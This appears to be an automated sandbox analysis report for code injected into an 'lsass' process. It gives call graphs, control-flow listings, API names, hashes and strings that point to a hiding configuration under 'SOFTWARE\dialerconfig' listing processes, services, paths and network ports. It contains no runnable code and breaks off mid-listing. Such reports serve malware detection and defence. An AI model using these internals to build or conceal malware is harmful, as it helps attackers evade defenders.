261ac9021cc 14142 261ac9021fd 14141->14142 14143 261ac9022e8 14142->14143 14144 261ac90231d 14142->14144 14151 261ac902221 14142->14151 14145 261ac902391 14144->14145 14146 261ac902322 14144->14146 14145->14143 14148 261ac902396 14145->14148 14162 261ac9030b4 GetProcessHeap HeapAlloc 14146->14162 14150 261ac9030b4 11 API calls 14148->14150 14149 261ac902263 StrCmpNIW 14149->14151 14154 261ac90233a 14150->14154 14151->14143 14151->14149 14152 261ac90228a 14151->14152 14152->14151 14155 261ac901d60 14152->14155 14154->14143 14154->14154 14156 261ac901e36 14155->14156 14157 261ac901d8f GetProcessHeap HeapAlloc 14155->14157 14156->14152 14158 261ac901dc5 14157->14158 14158->14156 14158->14158 14159 261ac901e18 GetProcessHeap HeapFree 14158->14159 14160 261ac901554 2 API calls 14158->14160 14159->14156 14160->14159 14167 261ac903107 14162->14167 14163 261ac9031d1 GetProcessHeap HeapFree 14163->14154 14164 261ac9031cc 14164->14163 14165 261ac90315e StrCmpNIW 14165->14167 14166 261ac901d60 6 API calls 14166->14167 14167->14163 14167->14164 14167->14165 14167->14166 14168 261ac90b860 14173 261ac90b871 14168->14173 14169 261ac90b8c2 14178 261ac90b840 14169->14178 14170 261ac90b8a6 HeapAlloc 14171 261ac90b8c0 14170->14171 14170->14173 14173->14169 14173->14170 14175 261ac909d24 14173->14175 14181 261ac909d54 14175->14181 14177 261ac909d32 14177->14173 14190 261ac90b3a4 GetLastError 14178->14190 14180 261ac90b849 14180->14171 14186 261ac90ad9c EnterCriticalSection 14181->14186 14187 261ac909d61 14186->14187 14188 261ac90adf0 LeaveCriticalSection 14187->14188 14189 261ac909d7f 14188->14189 14189->14177 14192 261ac90b3c6 14190->14192 14194 261ac90b3d3 SetLastError 14192->14194 14211 261ac90d608 14192->14211 14193 261ac90b3ee 14193->14194 14216 261ac90b860 14193->14216 14194->14180 14198 261ac90b41f 14201 261ac90d608 6 API calls 14198->14201 14199 261ac90b40f 14200 261ac90d608 6 API calls 14199->14200 14205 261ac90b416 14200->14205 14202 261ac90b427 14201->14202 14203 261ac90b42b 14202->14203 14204 261ac90b43d 14202->14204 14206 261ac90d608 6 API calls 14203->14206 14228 261ac90af94 14204->14228 14223 261ac90b8d8 14205->14223 14206->14205 14210 261ac90b8d8 10 API calls 14210->14194 14233 261ac90d2cc 14211->14233 14213 261ac90d636 14214 261ac90d648 TlsSetValue 14213->14214 14215 261ac90d640 14213->14215 14214->14215 14215->14193 14221 261ac90b871 14216->14221 14217 261ac90b8c2 14220 261ac90b840 11 API calls 14217->14220 14218 261ac90b8a6 HeapAlloc 14219 261ac90b401 14218->14219 14218->14221 14219->14198 14219->14199 14220->14219 14221->14217 14221->14218 14222 261ac909d24 2 API calls 14221->14222 14222->14221 14224 261ac90b90f 14223->14224 14225 261ac90b8dd HeapFree 14223->14225 14224->14194 14225->14224 14226 261ac90b8f8 14225->14226 14227 261ac90b840 11 API calls 14226->14227 14227->14224 14242 261ac90ae6c 14228->14242 14234 261ac90d32d 14233->14234 14235 261ac90d328 14233->14235 14234->14213 14235->14234 14236 261ac90d35c LoadLibraryExW 14235->14236 14239 261ac90d3f5 FreeLibrary 14235->14239 14240 261ac90d410 14235->14240 14241 261ac90d3b7 LoadLibraryExW 14235->14241 14236->14235 14237 261ac90d37d GetLastError 14236->14237 14237->14235 14238 261ac90d41e GetProcAddress 14238->14234 14239->14235 14240->14234 14240->14238 14241->14235 14243 261ac90ad9c EnterCriticalSection 14242->14243 14244 261ac90ae88 14243->14244 14245 261ac90adf0 LeaveCriticalSection 14244->14245 14246 261ac90aea0 14245->14246 14247 261ac90aeec 14246->14247 14248 261ac90ad9c EnterCriticalSection 14247->14248 14249 261ac90af08 14248->14249 14254 261ac90b17c 14249->14254 14251 261ac90af1e 14252 261ac90adf0 LeaveCriticalSection 14251->14252 14253 261ac90af26 14252->14253 14253->14210 14255 261ac90b1c4 14254->14255 14256 261ac90b198 14254->14256 14255->14251 14256->14255 14258 261ac90e6e4 14256->14258 14259 261ac90e780 14258->14259 14263 261ac90e707 14258->14263 14260 261ac90e7d3 14259->14260 14262 261ac90b8d8 12 API calls 14259->14262 14324 261ac90e884 14260->14324 14264 261ac90e7a4 14262->14264 14263->14259 14265 261ac90e746 14263->14265 14268 261ac90b8d8 12 API calls 14263->14268 14266 261ac90b8d8 12 API calls 14264->14266 14267 261ac90e768 14265->14267 14273 261ac90b8d8 12 API calls 14265->14273 14269 261ac90e7b8 14266->14269 14270 261ac90b8d8 12 API calls 14267->14270 14271 261ac90e73a 14268->14271 14272 261ac90b8d8 12 API calls 14269->14272 14275 261ac90e774 14270->14275 14284 261ac910e98 14271->14284 14278 261ac90e7c7 14272->14278 14279 261ac90e75c 14273->14279 14274 261ac90e83e 14280 261ac90b8d8 12 API calls 14275->14280 14276 261ac90e7df 14276->14274 14281 261ac90b8d8 12 API calls 14276->14281 14282 261ac90b8d8 12 API calls 14278->14282 14312 261ac910fa4 14279->14312 14280->14259 14281->14276 14282->14260 14285 261ac910ea1 14284->14285 14310 261ac910f9c 14284->14310 14286 261ac910ebb 14285->14286 14288 261ac90b8d8 12 API calls 14285->14288 14287 261ac910ecd 14286->14287 14289 261ac90b8d8 12 API calls 14286->14289 14290 261ac910edf 14287->14290 14291 261ac90b8d8 12 API calls 14287->14291 14288->14286 14289->14287 14292 261ac910ef1 14290->14292 14293 261ac90b8d8 12 API calls 14290->14293 14291->14290 14294 261ac910f03 14292->14294 14295 261ac90b8d8 12 API calls 14292->14295 14293->14292 14296 261ac910f15 14294->14296 14298 261ac90b8d8 12 API calls 14294->14298 14295->14294 14297 261ac910f27 14296->14297 14299 261ac90b8d8 12 API calls 14296->14299 14300 261ac910f39 14297->14300 14301 261ac90b8d8 12 API calls 14297->14301 14298->14296 14299->14297 14302 261ac910f4b 14300->14302 14303 261ac90b8d8 12 API calls 14300->14303 14301->14300 14304 261ac910f5d 14302->14304 14305 261ac90b8d8 12 API calls 14302->14305 14303->14302 14306 261ac910f72 14304->14306 14307 261ac90b8d8 12 API calls 14304->14307 14305->14304 14308 261ac910f87 14306->14308 14309 261ac90b8d8 12 API calls 14306->14309 14307->14306 14308->14310 14311 261ac90b8d8 12 API calls 14308->14311 14309->14308 14310->14265 14311->14310 14313 261ac910fa9 14312->14313 14322 261ac91100a 14312->14322 14314 261ac910fc2 14313->14314 14315 261ac90b8d8 12 API calls 14313->14315 14316 261ac910fd4 14314->14316 14317 261ac90b8d8 12 API calls 14314->14317 14315->14314 14318 261ac910fe6 14316->14318 14319 261ac90b8d8 12 API calls 14316->14319 14317->14316 14320 261ac90b8d8 12 API calls 14318->14320 14321 261ac910ff8 14318->14321 14319->14318 14320->14321 14321->14322 14323 261ac90b8d8 12 API calls 14321->14323 14322->14267 14323->14322 14325 261ac90e8b4 14324->14325 14326 261ac90e889 14324->14326 14325->14276 14326->14325 14330 261ac911068 14326->14330 14329 261ac90b8d8 12 API calls 14329->14325 14331 261ac911071 14330->14331 14332 261ac90e8ac 14330->14332 14366 261ac911010 14331->14366 14332->14329 14335 261ac911010 12 API calls 14336 261ac91109a 14335->14336 14337 261ac911010 12 API calls 14336->14337 14338 261ac9110a8 14337->14338 14339 261ac911010 12 API calls 14338->14339 14340 261ac9110b6 14339->14340 14341 261ac911010 12 API calls 14340->14341 14342 261ac9110c5 14341->14342 14343 261ac90b8d8 12 API calls 14342->14343 14344 261ac9110d1 14343->14344 14345 261ac90b8d8 12 API calls 14344->14345 14346 261ac9110dd 14345->14346 14347 261ac90b8d8 12 API calls 14346->14347 14348 261ac9110e9 14347->14348 14349 261ac911010 12 API calls 14348->14349 14350 261ac9110f7 14349->14350 14351 261ac911010 12 API calls 14350->14351 14352 261ac911105 14351->14352 14353 261ac911010 12 API calls 14352->14353 14354 261ac911113 14353->14354 14355 261ac911010 12 API calls 14354->14355 14356 261ac911121 14355->14356 14357 261ac911010 12 API calls 14356->14357 14358 261ac911130 14357->14358 14359 261ac90b8d8 12 API calls 14358->14359 14360 261ac91113c 14359->14360 14361 261ac90b8d8 12 API calls 14360->14361 14362 261ac911148 14361->14362 14363 261ac90b8d8 12 API calls 14362->14363 14364 261ac911154 14363->14364 14365 261ac90b8d8 12 API calls 14364->14365 14365->14332 14367 261ac911044 14366->14367 14368 261ac911058 14366->14368 14367->14368 14369 261ac90b8d8 12 API calls 14367->14369 14368->14335 14369->14367 14370 261ac9026f0 14371 261ac90276f 14370->14371 14372 261ac9027d1 GetFileType 14371->14372 14381 261ac902961 14371->14381 14373 261ac9027f5 14372->14373 14374 261ac9027df StrCpyW 14372->14374 14386 261ac901ab8 GetFinalPathNameByHandleW 14373->14386 14375 261ac902804 14374->14375 14379 261ac90280e 14375->14379 14382 261ac9028b3 14375->14382 14378 261ac903930 StrCmpNIW 14378->14382 14379->14381 14391 261ac903930 14379->14391 14394 261ac903200 StrCmpIW 14379->14394 14398 261ac901e4c 14379->14398 14382->14378 14382->14381 14384 261ac903200 4 API calls 14382->14384 14385 261ac901e4c 2 API calls 14382->14385 14384->14382 14385->14382 14387 261ac901b21 14386->14387 14388 261ac901ae2 StrCmpNIW 14386->14388 14387->14375 14388->14387 14389 261ac901afc lstrlenW 14388->14389 14389->14387 14390 261ac901b0e StrCpyW 14389->14390 14390->14387 14392 261ac90393d StrCmpNIW 14391->14392 14393 261ac903952 14391->14393 14392->14393 14393->14379 14395 261ac903232 StrCpyW StrCatW 14394->14395 14396 261ac903249 PathCombineW 14394->14396 14397 261ac903252 14395->14397 14396->14397 14397->14379 14399 261ac901e63 14398->14399 14400 261ac901e6c 14398->14400 14401 261ac901554 2 API calls 14399->14401 14400->14379 14401->14400

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 56 261ac9026f0-261ac902774 call 261ac91eca0 59 261ac90277a-261ac90277d 56->59 60 261ac90298f-261ac9029b2 56->60 59->60 61 261ac902783-261ac902791 59->61 61->60 62 261ac902797-261ac9027dd call 261ac908d50 * 3 GetFileType 61->62 69 261ac9027f5-261ac9027ff call 261ac901ab8 62->69 70 261ac9027df-261ac9027f3 StrCpyW 62->70 71 261ac902804-261ac902808 69->71 70->71 73 261ac9028b3-261ac9028b9 71->73 74 261ac90280e-261ac902827 call 261ac903264 call 261ac903930 71->74 75 261ac9028bc-261ac9028c1 73->75 87 261ac902829-261ac902858 call 261ac903264 call 261ac903200 call 261ac901e4c 74->87 88 261ac90285e-261ac9028a8 call 261ac91eca0 74->88 77 261ac9028c3-261ac9028c6 75->77 78 261ac9028df 75->78 77->78 81 261ac9028c8-261ac9028cb 77->81 80 261ac9028e1-261ac9028fa call 261ac903264 call 261ac903930 78->80 98 261ac90293b-261ac90293d 80->98 99 261ac9028fc-261ac90292b call 261ac903264 call 261ac903200 call 261ac901e4c 80->99 81->78 84 261ac9028cd-261ac9028d0 81->84 84->78 86 261ac9028d2-261ac9028d5 84->86 86->78 90 261ac9028d7-261ac9028dd 86->90 87->60 87->88 88->60 100 261ac9028ae 88->100 90->78 90->80 101 261ac902961-261ac902964 98->101 102 261ac90293f-261ac90295c call 261ac9086a0 98->102 99->98 122 261ac90292d-261ac902937 99->122 100->74 107 261ac902966-261ac90296c 101->107 108 261ac90296e-261ac902971 101->108 102->75 107->60 112 261ac902973-261ac902976 108->112 113 261ac90298c 108->113 112->113 115 261ac902978-261ac90297b 112->115 113->60 115->113 117 261ac90297d-261ac902980 115->117 117->113 119 261ac902982-261ac902985 117->119 119->113 121 261ac902987-261ac90298a 119->121 121->60 121->113 122->60 123 261ac902939 122->123 123->75
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction ID: ff6bc897040fc2b7b90d748e7b64751de366c7f705f3dda71cc99942044e07ac
                                                                                                      • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction Fuzzy Hash: DD71D536202F81C6E7649FA99B4C3AA6795F784BACF4C4016DE5943F89DE36DE24C700

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 124 261ac9021cc-261ac9021f7 call 261ac91ece0 126 261ac9021fd-261ac902206 124->126 127 261ac902208-261ac90220c 126->127 128 261ac90220f-261ac902212 126->128 127->128 129 261ac902218-261ac90221b 128->129 130 261ac9023cd-261ac9023ed 128->130 131 261ac902221-261ac902233 129->131 132 261ac90231d-261ac902320 129->132 131->130 135 261ac902239-261ac90224f 131->135 133 261ac902391-261ac902394 132->133 134 261ac902322-261ac90233c call 261ac9030b4 132->134 133->130 139 261ac902396-261ac9023a9 call 261ac9030b4 133->139 134->130 144 261ac902342-261ac902358 134->144 137 261ac902251-261ac902261 135->137 138 261ac90227d-261ac902288 call 261ac901d28 135->138 137->138 141 261ac902263-261ac90227b StrCmpNIW 137->141 145 261ac9022a9-261ac9022bb 138->145 152 261ac90228a-261ac9022a2 call 261ac901d60 138->152 139->130 151 261ac9023ab-261ac9023b3 139->151 141->138 141->145 144->130 150 261ac90235a-261ac902376 144->150 148 261ac9022cb-261ac9022cd 145->148 149 261ac9022bd-261ac9022bf 145->149 156 261ac9022d4 148->156 157 261ac9022cf-261ac9022d2 148->157 154 261ac9022c1-261ac9022c4 149->154 155 261ac9022c6-261ac9022c9 149->155 158 261ac90237a-261ac90238d 150->158 151->130 159 261ac9023b5-261ac9023bd 151->159 152->145 164 261ac9022a4-261ac9022a7 152->164 162 261ac9022d7-261ac9022da 154->162 155->162 156->162 157->162 158->158 163 261ac90238f 158->163 160 261ac9023c0-261ac9023cb 159->160 160->130 160->160 165 261ac9022e8-261ac9022eb 162->165 166 261ac9022dc-261ac9022e2 162->166 163->130 164->162 165->130 167 261ac9022f1-261ac9022f5 165->167 166->135 166->165 168 261ac9022f7-261ac9022fa 167->168 169 261ac90230c-261ac902318 167->169 168->130 170 261ac902300-261ac902305 168->170 169->130 170->167 171 261ac902307 170->171 171->130
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID: S$dialer
                                                                                                      • API String ID: 756756679-3873981283
                                                                                                      • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                                                      • Instruction ID: a0d72138f5b87211087cdad282d03a7789c7940c3e3da31ecf8d1c04d7fb8e1d
                                                                                                      • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                                                                      • Instruction Fuzzy Hash: E0519532B12F64C6F768CBE696486AD63A4F704BA8F189425DE5523B44DB36EC61C310

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                      • API String ID: 106492572-2879589442
                                                                                                      • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction ID: 4e3c61d095f320f0bb24a8820c1c27ceedff52166cbb4e87cdbb9a0357a456d2
                                                                                                      • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction Fuzzy Hash: 3E715A36312F40DAEB50DFA9E98969927B8FB84B9CF081115DE4D53B28DF3AD965C300

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                      • String ID: \\?\
                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                      • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction ID: f6aa621237e332ac6ce8727f2d1ad507e5a201ec82ed6ad1687992cf6579201d
                                                                                                      • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction Fuzzy Hash: 0DF0AF32301781D2EB608BA8F6993596774F784B9CF888024CA4846968DF2EDE98CB00

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 1683269324-0
                                                                                                      • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction ID: 76cf64d1bac4018ff413cd988f6b5c93663058f0a86c63448ce7790e587a8ac3
                                                                                                      • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction Fuzzy Hash: 15115B70612701C6F7A197E9AB4F35932A8B79476CF4C00299A1689194EF3BEEA4C200

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00000261AC901650: GetProcessHeap.KERNEL32 ref: 00000261AC90165B
                                                                                                        • Part of subcall function 00000261AC901650: HeapAlloc.KERNEL32 ref: 00000261AC90166A
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9016DA
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC901707
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901721
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC901741
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC90175C
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC90177C
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901797
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9017B7
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC9017D2
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9017F2
                                                                                                      • Sleep.KERNEL32 ref: 00000261AC901C43
                                                                                                      • SleepEx.KERNELBASE ref: 00000261AC901C49
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC90180D
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC90182D
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901848
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC901868
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC901883
                                                                                                        • Part of subcall function 00000261AC901650: RegOpenKeyExW.ADVAPI32 ref: 00000261AC9018A3
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC9018BE
                                                                                                        • Part of subcall function 00000261AC901650: RegCloseKey.ADVAPI32 ref: 00000261AC9018C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1534210851-0
                                                                                                      • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction ID: 82e00eca69bcfc2eff97743fba3731d8fe79f1ab825d46741ac9dd8b0ae167cb
                                                                                                      • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction Fuzzy Hash: AF31DD35202A01D1FF559FB6EB4935E22A5AB44BE8F0C5021EE09876E6EF26EC70C250

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 229 261ac903930-261ac90393b 230 261ac903955-261ac90395c 229->230 231 261ac90393d-261ac903950 StrCmpNIW 229->231 231->230 232 261ac903952 231->232 232->230
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 0-3528709123
                                                                                                      • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                                      • Instruction ID: 3cc756c5df4cd04c0ef55a05882639c61e2ad0c74402b1df68200daab3f1bb1b
                                                                                                      • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                                      • Instruction Fuzzy Hash: 33D0A73031374BC6FF54DFEA8ACA2602368FB4571CF4C8024CA1142514DB1AAEADC710

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 233 261ac8d2908-261ac8d2973 call 261ac8d0f34 * 4 242 261ac8d2979-261ac8d297c 233->242 243 261ac8d2b8b 233->243 242->243 245 261ac8d2982-261ac8d2985 242->245 244 261ac8d2b8d-261ac8d2ba9 243->244 245->243 246 261ac8d298b-261ac8d298e 245->246 246->243 247 261ac8d2994-261ac8d29b2 246->247 247->243 249 261ac8d29b8-261ac8d29dc call 261ac8d0d6c 247->249 252 261ac8d29de-261ac8d2a09 call 261ac8d0d6c 249->252 253 261ac8d2a0b-261ac8d2a12 249->253 252->253 255 261ac8d2a18-261ac8d2a25 253->255 256 261ac8d2ab2-261ac8d2ab9 253->256 255->256 260 261ac8d2a2b-261ac8d2a39 LoadLibraryA 255->260 257 261ac8d2abf-261ac8d2ad6 256->257 258 261ac8d2b6c-261ac8d2b89 256->258 257->258 261 261ac8d2adc 257->261 258->244 262 261ac8d2a9d-261ac8d2aa5 260->262 263 261ac8d2a3b-261ac8d2a45 260->263 266 261ac8d2ae2-261ac8d2af7 261->266 262->260 264 261ac8d2aa7-261ac8d2aac 262->264 267 261ac8d2a48-261ac8d2a4c 263->267 264->256 268 261ac8d2af9-261ac8d2b0a 266->268 269 261ac8d2b5b-261ac8d2b66 266->269 270 261ac8d2a4e-261ac8d2a52 267->270 271 261ac8d2a9a 267->271 273 261ac8d2b0c-261ac8d2b13 268->273 274 261ac8d2b15-261ac8d2b19 268->274 269->258 269->266 275 261ac8d2a7d-261ac8d2a87 270->275 276 261ac8d2a54-261ac8d2a7b 270->276 271->262 277 261ac8d2b48-261ac8d2b59 273->277 278 261ac8d2b1b-261ac8d2b22 274->278 279 261ac8d2b24-261ac8d2b28 274->279 280 261ac8d2a8d-261ac8d2a98 275->280 276->280 277->268 277->269 278->277 281 261ac8d2b3a-261ac8d2b3e 279->281 282 261ac8d2b2a-261ac8d2b38 279->282 280->267 281->277 283 261ac8d2b40-261ac8d2b43 281->283 282->277 283->277
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12819648693.00000261AC8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC8D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac8d0000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 1029625771-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: a0f64ac41a019554900ef271842948e46edc4507b0a67bd71b44a59f7525efdf
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 39611F32702752C7EAAACFA9D44876CB391FB04BA4F588121DA1907785DB3AFC67D700

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 284 261ac90b860-261ac90b86f 285 261ac90b871-261ac90b87d 284->285 286 261ac90b87f-261ac90b88f 284->286 285->286 287 261ac90b8c2-261ac90b8cd call 261ac90b840 285->287 288 261ac90b8a6-261ac90b8be HeapAlloc 286->288 293 261ac90b8cf-261ac90b8d4 287->293 289 261ac90b891-261ac90b898 call 261ac90e650 288->289 290 261ac90b8c0 288->290 289->287 296 261ac90b89a-261ac90b8a4 call 261ac909d24 289->296 290->293 296->287 296->288
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001B.00000002.12820179196.00000261AC900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000261AC900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_27_2_261ac900000_lsass.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 4292702814-0
                                                                                                      • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                                      • Instruction ID: 9be9cd167b6386ddeb86ba5c5470eb8bd2a74a01cb3c9160dc0c2a264724eb68
                                                                                                      • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                                                                                      • Instruction Fuzzy Hash: 34F0B4B4303305C0FE95ABE2970D39512807F88B6CF0C44748E0A863E5EE2EECA4C210

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 343 261ac902cdc-261ac902d55 call 261ac91ecc0 346 261ac902d5b-261ac902d61 343->346 347 261ac903090-261ac9030b3 343->347 346->347 348 261ac902d67-261ac902d6a 346->348 348->347 349 261ac902d70-261ac902d73 348->349 349->347 350 261ac902d79-261ac902d89 GetModuleHandleA 349->350 351 261ac902d8b-261ac902d9b GetProcAddress 350->351 352 261ac902d9d 350->352 353 261ac902da0-261ac902dbe 351->353 352->353 353->347 355 261ac902dc4-261ac902de3 StrCmpNIW 353->355 355->347 356 261ac902de9-261ac902ded 355->356 356->347 357 261ac902df3-261ac902dfd 356->357 357->347 358 261ac902e03-261ac902e0a 357->358 358->347 359 261ac902e10-261ac902e23 358->359 360 261ac902e33 359->360 361 261ac902e25-261ac902e31 359->361 362 261ac902e36-261ac902e3a 360->362 361->362 363 261ac902e4a 362->363 364 261ac902e3c-261ac902e48 362->364 365 261ac902e4d-261ac902e57 363->365 364->365 366 261ac902f4d-261ac902f51 365->366 367 261ac902e5d-261ac902e60 365->367 368 261ac903082-261ac90308a 366->368 369 261ac902f57-261ac902f5a 366->369 370 261ac902e72-261ac902e7c 367->370 371 261ac902e62-261ac902e6f call 261ac901a14 367->371 368->347 368->359 372 261ac902f6b-261ac902f75 369->372 373 261ac902f5c-261ac902f68 call 261ac901a14 369->373 375 261ac902e7e-261ac902e8b 370->375 376 261ac902eb0-261ac902eba 370->376 371->370 380 261ac902fa5-261ac902fa8 372->380 381 261ac902f77-261ac902f84 372->381 373->372 375->376 383 261ac902e8d-261ac902e9a 375->383 377 261ac902eea-261ac902eed 376->377 378 261ac902ebc-261ac902ec9 376->378 385 261ac902efb-261ac902f08 lstrlenW 377->385 386 261ac902eef-261ac902ef9 call 